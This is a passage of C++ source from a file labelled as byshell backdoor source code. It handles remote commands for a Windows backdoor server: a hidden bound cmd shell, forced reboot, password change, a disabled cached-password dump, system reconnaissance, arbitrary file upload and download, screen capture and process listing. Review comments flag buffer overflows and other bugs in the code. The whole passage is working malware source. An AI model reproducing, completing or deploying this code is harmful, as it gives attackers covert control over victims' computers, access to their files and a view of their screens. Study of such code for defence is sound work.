📄 ntboot.cpp

📁 byshell后门源代码
	extshell.si.hStdError=extshell.hwrite;extshell.si.hStdOutput=extshell.hwrite;extshell.si.wShowWindow=SW_HIDE;
	extshell.si.hStdInput=extshell.cread;extshell.si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
	if(!CreateProcess(0,cmdline,0,0,1,0,0,0,&extshell.si,&extshell.pi)){
		memset(workbuff,0,65520);strcpy(workbuff,"cmd bind error");*psendlength=strlen(workbuff);	return 0;
		}
	memset(workbuff,0,65520);Sleep(200);DWORD bytesread;ReadFile(extshell.hread,workbuff,65520,&bytesread,0);*psendlength=bytesread;return 1;
}
//endshell
if(workflag==1 && strncmp(workbuff,"endshell",8)==0){
	DWORD byteswritten;WriteFile(extshell.cwrite,"exit\r\n",6,&byteswritten,0);
	CloseHandle(extshell.hread);CloseHandle(extshell.hwrite);CloseHandle(extshell.cread);CloseHandle(extshell.cwrite);
	memset(workbuff,0,65520);strcpy(workbuff,"shell terminated\n");*psendlength=strlen(workbuff);	return 0;
}
//work in shell
//Q7: works under nc but not with my own client, because my client does not send a trailing \r\n.
//Q4: in the shell, after typing 'net user' & 'net user byf' a 'More?' prompt appeared.
//Changing WriteFile's third parameter (bytes to write) from a fixed 2048 to the exact command length solved it. Why? Presumably because the surplus bytes of a 2048-byte write (the zero padding of workbuff) reached cmd's stdin and were taken as continuation input — not confirmed.
if(workflag==1 && strncmp(workbuff,"endshell",8)!=0){
	DWORD byteswritten=strlen(workbuff);WriteFile(extshell.cwrite,workbuff,byteswritten,&byteswritten,0);
	DWORD bytesread;Sleep(200);memset(workbuff,0,65520);PeekNamedPipe(extshell.hread,0,0,0,&bytesread,0);
	if(!bytesread){strcpy(workbuff,"pipe has no ret data\n");*psendlength=strlen(workbuff);return 1;}
	//Behaves like cmd. The "no return data" case above probably cannot occur in practice; note that the ReadFile result below is not checked either.
	ReadFile(extshell.hread,workbuff,65520,&bytesread,0);
	*psendlength=bytesread;return 1;
}
//ok,shell complete
//byver
if(workflag==0 && strncmp(workbuff,"byver",5)==0){strcpy(workbuff,"byshell server version 0.63\nReleased Dec 19,2004 Copyleft@ \"by\" co.ltd.\n");
*psendlength=strlen(workbuff);	return 0;}
//reboot: enable SeShutdownPrivilege on the current process token, then ExitWindowsEx(EWX_REBOOT).
//None of OpenProcessToken / LookupPrivilegeValue / AdjustTokenPrivileges / ExitWindowsEx is checked, so a failure
//(e.g. the privilege not being held) is never reported; the "rebooting..." reply below is sent regardless.
if(workflag==0 && strncmp(workbuff,"reboot",6)==0){strcpy(workbuff,"rebooting...maybe on Win2k3 you cannot achieve it.\n");
HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);
TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);ExitWindowsEx(EWX_REBOOT,0x00050000);
*psendlength=strlen(workbuff);	return 0;}
//change pass: replaces the access password with the next 16 bytes of the request.
//strncpy copies at most 16 bytes and does not NUL-terminate when the input is 16 bytes or longer; pwd is declared
//outside this fragment, so confirm its size and how the password check reads it (a fixed-width memcmp vs. a strcmp that needs a terminator).
if(workflag==0 && strncmp(workbuff,"chpass",6)==0){
	strncpy(pwd,workbuff+6,16);memset(workbuff,0,65520);strcpy(workbuff,"chpass success\n");
	*psendlength=strlen(workbuff);	return 0;
}
//get local pass
//This API is not documented by Microsoft (Q5) and only exists on Windows 9x, so the passdump handler below is disabled.
/*if(workflag==0 && strncmp(workbuff,"passdump",8)==0){
	HINSTANCE dllinst=LoadLibrary("MPR.DLL");
	if(!dllinst){memset(workbuff,0,65520);strcpy(workbuff,"loaddll error");*psendlength=16;return 0;}
	int (__stdcall *WNetEnumCachedPasswords)(LPSTR,DWORD,DWORD,void *,DWORD);
	WNetEnumCachedPasswords=(int (__stdcall *)(char *,unsigned long,unsigned long,void *,unsigned long))GetProcAddress(dllinst,"WNetEnumCachedPasswords");
	WNetEnumCachedPasswords(0,0,0xFF,cachecallback,0);
	FreeLibrary(dllinst);*psendlength=128;
	return 0;
}*/
/*
//Layout of a Win9x cached-password entry (PASSWORD_CACHE_ENTRY)
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry;//length of structure 
WORD cbResource;//length of the resource name, in bytes
WORD cbPassword;//length of the password, in bytes
BYTE iEntry;//entry index
BYTE nType;//type of entry
char abResource[1];//start of resource name,password immediately follows resource name
} PASSWORD_CACHE_ENTRY;

typedef BOOL (WINAPI *CACHECALLBACK)(PASSWORD_CACHE_ENTRY *pce,DWORD);

//Prototype of the cached-password enumeration function
typedef WORD (WINAPI *PWNetEnumCachedPasswords)(
LPSTR pbPrefix,
DWORD cbPrefix,
DWORD nType,
CACHECALLBACK pfnCallback,
DWORD UNKNOWN
);
*/

//sysinfo: gathers computer name, memory size, OS version, system directory, CPUID brand strings, a few
//ZwQuerySystemInformation classes and the drive types into workbuff. Everything is appended with strcat into
//workbuff (assumed 65520 bytes from the memset calls) without length checks; the pieces are small today, but
//keep that in mind if more output is added.
if(workflag==0 && strncmp(workbuff,"sysinfo",7)==0){UINT ret;void * retp;char syspath[512];
	DWORD cnamelen=128;memset(workbuff,0,65520);strcpy(workbuff,"\n**********************\nBasic information:\ncomputer name:\n");
	GetComputerName(syspath,&cnamelen);strcat(workbuff,syspath);
	MEMORYSTATUS mem;GlobalMemoryStatus(&mem);
	sprintf(syspath,"\nmemory:%dK\n",mem.dwTotalPhys);strcat(workbuff,syspath);OSVERSIONINFO osinfo;
	osinfo.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);GetVersionEx(&osinfo);strcat(workbuff,"OS_infomation:\n");
	switch(osinfo.dwPlatformId){case VER_PLATFORM_WIN32_NT:strcat(workbuff,"WindowsNT  ");break;case VER_PLATFORM_WIN32_WINDOWS:strcat(workbuff,"Windows9x  ");break;case VER_PLATFORM_WIN32s:strcat(workbuff,"Win3.1  ");break;default:strcat(workbuff,"??!!OS  ");}
	sprintf(syspath,"%d.%d,build %d\n",osinfo.dwMajorVersion,osinfo.dwMinorVersion,osinfo.dwBuildNumber);
	strcat(workbuff,syspath);strcat(workbuff,osinfo.szCSDVersion);
	strcat(workbuff,"\nsysDir:");GetSystemDirectory(syspath,256);strcat(workbuff,syspath);strcat(workbuff,"\n");
	//CPU: CPUID could also return a serial number, but that is not implemented here.
	strcat(workbuff,"\n*******************************\nthe very CPU(used by our server code) information below is queried from CPU hardware:) so it is even more reliable then what M$ Wind0wZ shows\n");
	char cpubrand[128]={0};
	__asm{
	pushad
	mov eax,0
	cpuid
	mov dword ptr cpubrand,ebx
	mov dword ptr cpubrand+4,edx
	mov dword ptr cpubrand+8,ecx
	popad
	}
	strcat(workbuff,"CPU type:");strcat(workbuff,cpubrand);strcat(workbuff,"\ntype/family/model/stepping are too fussy so if you want directly use \'cmdset\'\n");
	__asm{
	pushad
	mov eax,80000002h
	cpuid
	mov dword ptr cpubrand,eax
	mov dword ptr cpubrand+4,ebx
	mov dword ptr cpubrand+8,ecx
	mov dword ptr cpubrand+12,edx
	popad
	}	
	strcat(workbuff,"CPU name:");strcat(workbuff,cpubrand);
	__asm{
	pushad
	mov eax,80000003h
	cpuid
	mov dword ptr cpubrand,eax
	mov dword ptr cpubrand+4,ebx
	mov dword ptr cpubrand+8,ecx
	mov dword ptr cpubrand+12,edx
	popad
	}	
	strcat(workbuff,cpubrand);
	__asm{
	pushad
	mov eax,80000004h
	cpuid
	mov dword ptr cpubrand,eax
	mov dword ptr cpubrand+4,ebx
	mov dword ptr cpubrand+8,ecx
	mov dword ptr cpubrand+12,edx
	popad
	}	
	strcat(workbuff,cpubrand);strcat(workbuff,"\n");
	//nativeAPI: ZwQuerySystemInformation is resolved from ntdll.dll at run time; neither the LoadLibrary nor the
	//GetProcAddress result is checked before it is called. The structure layouts below are hand-declared for Win2k.
	//Note (review): the field named ActiveProcessors is believed to be an affinity mask rather than a count in the
	//documented layout, yet the per-CPU loop further down walks sysptimearray[10] up to that value and can read past
	//the array on machines with more than a few processors; that loop also prints LARGE_INTEGER fields with %d,
	//which is a format/argument mismatch. Confirm on a real system before trusting its output.
	strcat(workbuff,"\n***********************************\nthe information below is queried by nativeAPI on win2k so maybe it cannot be used properly under other operating-system.\n");
	typedef unsigned long NTSTATUS;
	NTSTATUS (__stdcall *ZwQuerySystemInformation)( IN ULONG SysInfoClass, IN OUT PVOID SystemInformation,
                                               IN ULONG SystemInformationLength, OUT PULONG RetLen );
	typedef struct _SYSTEM_BASIC_INFORMATION {//0
	ULONG Unknown;
	ULONG MaximumIncrement;
	ULONG PhysicalPageSize;
	ULONG NumberOfPhysicalPages;
	ULONG LowestPhysicalPage;
	ULONG HighestPhysicalPage;
	ULONG AllocationGranularity;
	ULONG LowestUserAddress;
	ULONG HighestUserAddress;
	ULONG ActiveProcessors;
	UCHAR NumberProcessors;
	} SYSTEM_BASIC_INFORMATION;SYSTEM_BASIC_INFORMATION sysbinfo;
	retp=LoadLibrary("ntdll.dll");
	ZwQuerySystemInformation=(unsigned long (__stdcall *)(unsigned long,void *,unsigned long,unsigned long *))GetProcAddress((struct HINSTANCE__ *)retp,"ZwQuerySystemInformation");
	ZwQuerySystemInformation(0,&sysbinfo,sizeof(sysbinfo),(PULONG)&ret);
	sprintf(syspath,"PhysicalPageSize:0x%x\nNumberOfPhysicalPages:0x%x\nLowestPhysicalPage:0x%x\nHighestPhysicalPage:0x%x\nActiveCPUs:%d\nNumberCPUs:%d\n",
		sysbinfo.PhysicalPageSize,sysbinfo.NumberOfPhysicalPages,sysbinfo.LowestPhysicalPage,sysbinfo.HighestPhysicalPage,
		sysbinfo.ActiveProcessors,sysbinfo.NumberProcessors);
	strcat(workbuff,syspath);
	typedef struct _SYSTEM_CONFIGURATION_INFORMATION { // Information Class 7
	ULONG DiskCount;
	ULONG FloppyCount;
	ULONG CdRomCount;
	ULONG TapeCount;
	ULONG SerialCount;
	ULONG ParallelCount;
	} SYSTEM_CONFIGURATION_INFORMATION;SYSTEM_CONFIGURATION_INFORMATION syscinfo;
	ZwQuerySystemInformation(7,&syscinfo,sizeof(syscinfo),(PULONG)&ret);
	sprintf(syspath,"number_of_harddisk:%d\n",syscinfo.DiskCount);
	strcat(workbuff,syspath);
	typedef struct _SYSTEM_PROCESSOR_TIMES { // Information Class 8
	LARGE_INTEGER IdleTime;
	LARGE_INTEGER KernelTime;
	LARGE_INTEGER UserTime;
	LARGE_INTEGER DpcTime;
	LARGE_INTEGER InterruptTime;
	ULONG InterruptCount;
	} SYSTEM_PROCESSOR_TIMES;SYSTEM_PROCESSOR_TIMES sysptimearray[10];
	ZwQuerySystemInformation(8,sysptimearray,sizeof(SYSTEM_PROCESSOR_TIMES)*10,(PULONG)&ret);
	strcat(workbuff,"CPU using rates:\n(note:when time too large it will turn out to be a minus number)\n");
	for(UINT j=1;j<=sysbinfo.ActiveProcessors;j++){sprintf(syspath,"CPU%d: free time(IDLE time):%d,user-occupying time:%d\n",j,sysptimearray[j-1].IdleTime,sysptimearray[j-1].UserTime);strcat(workbuff,syspath);}
	
	strcat(workbuff,"\n****************************\ndisk partition informations:\n");
	for(char i[63]="A:\\";i[0]<='Z';++i[0]){
	ret=GetDriveType(i);switch(ret)
		{case DRIVE_FIXED:
		strcat(workbuff,strcat(i,"DRIVE_FIXED,hard disk.\n"));
		break;
		case DRIVE_CDROM:
		strcat(workbuff,strcat(i,"DRIVE_CDROM,CD-ROM,DVD-ROM or CD-RW,etc.\n"));
		break;
		case DRIVE_REMOTE:
		strcat(workbuff,strcat(i,"DRIVE_REMOTE,The drive is a remote (network) drive.\n"));
		break;
		case DRIVE_RAMDISK:
		strcat(workbuff,strcat(i,"DRIVE_RAMDISK,The drive is a RAM disk drive.\n"));
		break;
		case DRIVE_REMOVABLE:
		strcat(workbuff,strcat(i,"DRIVE_REMOVABLE,Floopy or U disk.\n"));
		break;
		case DRIVE_UNKNOWN: 
		strcat(workbuff,strcat(i,"DRIVE_UNKNOWN,The drive is a ???! drive.\n"));
		break;
		}
	memset(i+3,0,61);}strcat(workbuff,"***************************\nAlthough my soft can give you such information above,it is recommended for you to use a \'cmdset\' to see sth junk the M$ Wind0wZ returned for you.\n");
	*psendlength=strlen(workbuff);	return 0;
}


//get, workflag=2: directory get is not supported. filefp is an external variable. Packet loss and data division must be checked and handled.
//Data division, especially TCP segmentation, is a problem for us.
//~~~~~~~~how can this be solved in PUT? the next segment cannot pass the pwd check.
//Error packets are not checked; maybe the TCP layer takes care of that.
//Q9: sending 32K works, but the client receives 8K in the first packet and then many packets; glacier says more than 8K may be split.
//Q9: winsock max 8096, but errors still occur on large file transfers, hence 4000 bytes per chunk.
//Note (review): the file name is copied below with strcpy from workbuff (cleared as 65520 bytes elsewhere) into a
//255-byte local with no length check, and the path is not restricted, so an over-long or traversal name from the
//client goes straight to CreateFile.
//begin
if(workflag==0 && strncmp(workbuff,"get",3)==0){char filename[255]={0};strcpy(filename,workbuff+3);
	CloseHandle(filefp);packnum=0;//first close handle and clean packnum!!
	filefp=CreateFile(filename,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);//FILE_ATTRIBUTE_NORMAL ~~~~
	if(filefp==INVALID_HANDLE_VALUE){strcpy(workbuff,"no such file\n");*psendlength=strlen(workbuff);return 0;}
	memset(workbuff,0,65520);DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);	
	if(bytesread==4000){workbuff[0]=1;packnum=1;*psendlength=4005;return 2;}
	workbuff[4]='f';workbuff[0]=1;CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
//redirect
if(workflag==2 && strncmp(workbuff,"redirect",8)==0){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff+8,4);memset(workbuff,0,65520);
	packnum=reqpacknum-1;SetFilePointer(filefp,4000*packnum,0,FILE_BEGIN);
	DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);
	if(bytesread==4000){packnum+=1;memcpy(workbuff,&reqpacknum,4);*psendlength=4005;return 2;}
	memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
//continue: serves the next 4000-byte chunk when the requested packet number is the expected one.
//Note (review): in the "packet dropped" branch the message is written at workbuff+5 after workbuff was zeroed,
//so strlen(workbuff) is 0 and a zero-length reply is sent.
if(workflag==2 && strncmp(workbuff,"endget",6)!=0){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff,4);memset(workbuff,0,65520);
	if(reqpacknum!=packnum+1){strcpy(workbuff+5,"packet dropped\n");*psendlength=strlen(workbuff);return 2;}
	DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);
	if(bytesread==4000){packnum+=1;memcpy(workbuff,&reqpacknum,4);*psendlength=4005;return 2;}
	memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
//
//client break
if(workflag==2 && strncmp(workbuff,"endget",6)==0){memset(workbuff,0,65520);CloseHandle(filefp);
strcpy(workbuff,"getting terminated\n");*psendlength=strlen(workbuff);return 0;
}
//get complete

//put, workflag=3
//Note (review): as with get, the file name is strcpy'd from the request into a 255-byte local with no length check,
//and CREATE_ALWAYS overwrites whatever path the client names.
//begin
if(workflag==0 && strncmp(workbuff,"put",3)==0){packnum=0;char filename[255]={0};strcpy(filename,workbuff+3);
	filefp=CreateFile(filename,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);//FILE_ATTRIBUTE_NORMAL ~~~~
	if(filefp==INVALID_HANDLE_VALUE){strcpy(workbuff,"no privilege to write\n");*psendlength=strlen(workbuff);return 0;}
	memset(workbuff,0,65520);workbuff[0]=1;*psendlength=4;return 3;
}
//continue: expects the next sequential packet; an out-of-order packet number is answered with a "redirect" request.
//Note (review): the memset here clears 65536 bytes whereas every other clear of workbuff uses 65520 — if the buffer
//is 65520 bytes this writes 16 bytes past it. workbufflen-5 is also computed without first checking workbufflen >= 5.
if(workflag==3 && strncmp(workbuff,"endput",6)!=0){unsigned int rcvpacknum=0;memcpy(&rcvpacknum,workbuff,4);
	if(rcvpacknum!=packnum+1){memset(workbuff,0,65536);strcpy(workbuff,"redirect");packnum+=1;memcpy(workbuff+8,&packnum,4);packnum-=1;*psendlength=12;return 3;}
	DWORD byteswritten;WriteFile(filefp,workbuff+5,workbufflen-5,&byteswritten,0);
	if(byteswritten!=workbufflen-5){strcpy(workbuff,"file system error\n");*psendlength=strlen(workbuff);return 0;}
	if(workbuff[4]!='f'){packnum+=1;memset(workbuff,0,65520);packnum+=1;memcpy(workbuff,&packnum,4);packnum-=1;*psendlength=4;return 3;}
	CloseHandle(filefp);strcpy(workbuff,"file uploaded\n");*psendlength=strlen(workbuff);return 0;
}
//client break
if(workflag==3 && strncmp(workbuff,"endput",6)==0){CloseHandle(filefp);
strcpy(workbuff,"file upload terminated\n");*psendlength=strlen(workbuff);return 0;
}
//put complete
//screen, workflag=4, Q10/////////////////////////////////////////////////
//Release the heap block afterwards, or the machine may become unstable.
//Why does the client receive a bmp larger than the one the server sent?
//Note (review): the per-packet copy in the workflag==4 branch always reads 4000 bytes from the DIB, even on the final
//chunk where fewer remain, so the last memcpy reads past the end of the DIB allocation (the excess is not sent). Its
//"packet dropped" reply is also written at workbuff+5 after the first 20 bytes were zeroed, so it goes out zero-length.
if(workflag==0 && strncmp(workbuff,"screen",6)==0){memset(workbuff,0,65520);
	HDC hdcScreen = CreateDC("DISPLAY", NULL, NULL, NULL); 
	HDC hdcCompatible = CreateCompatibleDC(hdcScreen); 
	HBITMAP hbmScreen = CreateCompatibleBitmap(hdcScreen,GetDeviceCaps(hdcScreen, HORZRES),GetDeviceCaps(hdcScreen, VERTRES)); 
	SelectObject(hdcCompatible, hbmScreen);
	BitBlt(hdcCompatible,0,0,GetDeviceCaps(hdcScreen, HORZRES), GetDeviceCaps(hdcScreen, VERTRES),hdcScreen,0,0,SRCCOPY);
	HANDLE DDBtoDIB( HBITMAP bitmap, DWORD dwCompression, HPALETTE  hPal,DWORD * sizeimage);
	pbitmapwithoutfileh=DDBtoDIB(hbmScreen, BI_RGB,0,&sizeimage);
	BITMAPFILEHEADER bfh;
	bfh.bfType = ((WORD)('M'<< 8)|'B');
	bfh.bfReserved1 = 0;
	bfh.bfReserved2 = 0;
	bfh.bfSize = 54+sizeimage;
	bfh.bfOffBits = 54;
	/*filefp=CreateFile("c:\\temp.bmp",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
	DWORD byteswritten;WriteFile(filefp,&bfh,sizeof(BITMAPFILEHEADER),&byteswritten,0);
	WriteFile(filefp,(char*)pbitmapwithoutfileh,sizeof(BITMAPFILEHEADER)+sizeimage,&byteswritten,0);
	CloseHandle(filefp);*/

	memcpy(workbuff+5,&bfh,sizeof(BITMAPFILEHEADER));
	memcpy(workbuff+sizeof(BITMAPFILEHEADER)+5,(char*)pbitmapwithoutfileh,sizeof(BITMAPINFOHEADER));
	workbuff[0]=1;packnum=1;*psendlength=5+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER);
	return 4;
}
if(workflag==4){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff,4);memset(workbuff,0,20);
	if(reqpacknum!=packnum+1){strcpy(workbuff+5,"packet dropped\n");*psendlength=strlen(workbuff);return 0;}//check,but not solve
	memcpy(workbuff+5,(char*)pbitmapwithoutfileh+sizeof(BITMAPINFOHEADER)+(reqpacknum-2)*4000,4000);
	if((reqpacknum-1)*4000<sizeimage){packnum+=1;memcpy(workbuff,&reqpacknum,4);*psendlength=4005;return 4;}
	memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';GlobalFree(pbitmapwithoutfileh);*psendlength=5+sizeimage-(reqpacknum-2)*4000;return 0;
}
//end of screen,can be reused in memory transfer
//pslist: the output has some bugs and is very ugly :)
//Note (review): the loop discards the entry filled in by Process32First and only prints those from Process32Next, so
//the first process in the snapshot is never listed; and memset(procinfo,0,256) clears one byte past the 255-byte procinfo array.
if(workflag==0 && strncmp(workbuff,"pslist",6)==0){memset(workbuff,0,65520);strcpy(workbuff,"\nprocess:\npid\tfilename    \tnum_thread\tparentpid\n");
	HANDLE snapshot;snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32);
	char procinfo[255]={0};
	for(Process32First(snapshot,&processsnap);Process32Next(snapshot,&processsnap);){
	sprintf(procinfo,"%d\t%s\t%d\t%d\n",processsnap.th32ProcessID,processsnap.szExeFile,processsnap.cntThreads,processsnap.th32ParentProcessID);
	strcat(workbuff,procinfo);memset(procinfo,0,256);}
	CloseHandle(snapshot);*psendlength=strlen(workbuff);	return 0;
}
//modlist: tdlist may be of no use, just retrieve th32ThreadID.
//Q6: why can't this function retrieve info from system processes? not enough privilege.
//Note (review): strncpy(modinfo,workbuff+7,256) writes one byte past the 255-byte modinfo array and, when the
//argument is 255 bytes or longer, leaves it without a NUL terminator before atoi reads it.
if(workflag==0 && strncmp(workbuff,"modlist",7)==0){char modinfo[255]={0};DWORD modpid;strncpy(modinfo,workbuff+7,256);memset(workbuff,0,65520);
	if(!atoi(modinfo)){strcpy(workbuff,"illogical pid,please input a pid\n");*psendlength=strlen(workbuff);return 0;}
	HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;
